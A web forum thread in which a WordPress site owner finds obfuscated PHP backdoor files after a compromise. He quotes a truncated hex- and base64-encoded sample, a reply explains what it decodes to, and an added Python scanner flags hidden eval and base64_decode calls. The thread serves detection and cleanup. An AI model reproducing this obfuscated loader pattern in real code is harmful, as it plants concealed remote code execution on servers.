Quite disheartening... was this a failed hacking attempt?

by Big Al
2 replies
Hiya,

Around November time I had 11 or so sites hacked, and whenever you clicked on them in Google you were redirected elsewhere. I took all the sites down and started from scratch.

I've just logged into my hosting through FileZilla and noticed a number of bizarre file names:

maynord_spenser.php
evonne_arabella.php
certain_boycey.php

There is one of these weird filenames in each of my WordPress installations and they are outside the content, admin and includes folders. I've just scanned my site for malware and it came back ok so I'm not sure what they are?

I opened them up and the content looks something like this:

<?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x 63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36 \x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7 b("",$_8b7b1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ 7MjUzOzI1MzsyMjQ7MjUzOzIwODsyNTM7MjM0OzI1NTsyMjQ7M jUzOzI1MTsyMzA7MjI1OzIzMjsxNjc7MjAyOzIwODsyMDI7MjI xOzIyMTsxOTI7MjIxOzE3NTsyNDM7MTc1OzIwMjsyMDg7MjE2O zIwNjsyMjE7MTkzOzE5ODsxOTM7MjAwOzE3NTsyNDM7MTc1OzI wMjsyMDg7MjIzOzIwNjsyMjE7MjIwOzIwMjsxNjY7MTgwOzEzM DsxMzM7MjMwOzIyNTsyMzA7MjA4OzI1MjsyMzQ7MjUxOzE2Nzs xNjg7MjM1 .............. but a lot longer...........);?>

I even have an HTML site with one of these PHP files in it so I'm 99.9% sure it's an attempt at hacking.

Since getting hacked last time I changed my passwords, then have used WP Secure and Security Scan. My table prefixes are different and I've also uploaded htaccess files to the wp-admin folders.

Plus I make sure all my sites are up to date with the latest version of WordPress.

The sites seem to be performing ok and the malware scan came back negative so I'm thinking someone may have unsuccessfully tried to hack my sites (again). I want to delete these files.

Has anyone any idea how someone might be accessing my sites? Is it through my hosting account or my FTP software? I even improved the security on my machine to scan for malware...

I'd like to tighten this up further because I don't want these rogue PHP files on my sites at all.

Thanks,

Alan
  • minion
    Definitely looks like it - looks like it's encoded the contents using a combination of hex + base64.

    For example, the first part translates to $_8b7b="create_function"; $_8b7b1f="base64_decode";
    It's common for these kinds of attacks to be encoded like this.

    Just a quick question: Which host are you with?
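A static check for the pattern minion describes, as an added example that is not part of the original thread: it decodes `\xNN`-only PHP string literals without executing anything and flags a file that hides both a code-building function and a decoder this way. The function names, the `SUSPICIOUS` list and the benign sample are assumptions made for illustration; `SAMPLE` is the first two assignments from the file quoted in the post.

```python
import re

# Function names with no honest reason to be hidden behind \x escapes (assumed list).
SUSPICIOUS = {"create_function", "base64_decode", "eval", "assert",
              "gzinflate", "str_rot13"}

# A double-quoted PHP literal made only of \xNN escapes. Stray whitespace is
# tolerated because forum line-wrapping split some escapes in the quoted file.
HEX_LITERAL = re.compile(r'"\s*((?:\\\s*x\s*[0-9a-fA-F]\s*[0-9a-fA-F]\s*)+)"')
ASSIGN = re.compile(r'(\$\w+)\s*=\s*$')


def decode_hex_literal(body):
    """Turn the inside of a \\xNN-only literal into text without running PHP."""
    pairs = re.findall(r'\\\s*x\s*([0-9a-fA-F])\s*([0-9a-fA-F])', body)
    return bytes(int(a + b, 16) for a, b in pairs).decode("latin-1")


def scan_php(source):
    """Return (variable, decoded name) for each hex-hidden suspicious function name."""
    findings = []
    for m in HEX_LITERAL.finditer(source):
        decoded = decode_hex_literal(m.group(1))
        if decoded.lower() in SUSPICIOUS:
            var = ASSIGN.search(source[:m.start()])
            findings.append((var.group(1) if var else None, decoded))
    return findings


def looks_like_dropper(source):
    """True when a hidden code-builder and a hidden decoder appear together."""
    names = {name.lower() for _, name in scan_php(source)}
    builds = names & {"create_function", "eval", "assert"}
    decodes = names & {"base64_decode", "gzinflate", "str_rot13"}
    return bool(builds) and bool(decodes)


# First two assignments from the file quoted in the post, wrapping spaces included.
SAMPLE = r'''<?php $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x 63\x74\x69\x6f\x6e";$_8b7b1f="\x62\x61\x73\x65\x36 \x34\x5f\x64\x65\x63\x6f\x64\x65";'''
# Constructed benign file for contrast.
BENIGN = r'''<?php $greeting="Hello"; echo $greeting;'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE), ("benign", BENIGN)):
        print(label, scan_php(src), looks_like_dropper(src))
```

Pointing `scan_php` at the contents of every `.php` file under a web root gives a quick list of files to hand to the host or compare against a clean WordPress download.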
  • Big Al
    Thanks, I've got in touch with my hosting company and left them to it... fingers crossed. I'm with Dreamhost who I quite like and would like to stay with. I'm going to hound them on this one because I've been taking precautions with passwords and net security like never before since that last hacking brought down 11 sites.

    Like I said the sites 'seem' to be performing ok, my links are still intact and no funny redirection going on.

    Big Mike... do you have any recommendations for trojan or malware? I've started using Microsoft Security Essentials after good reviews and getting very annoyed with paid software that hampered my laptop's performance.

    Thanks.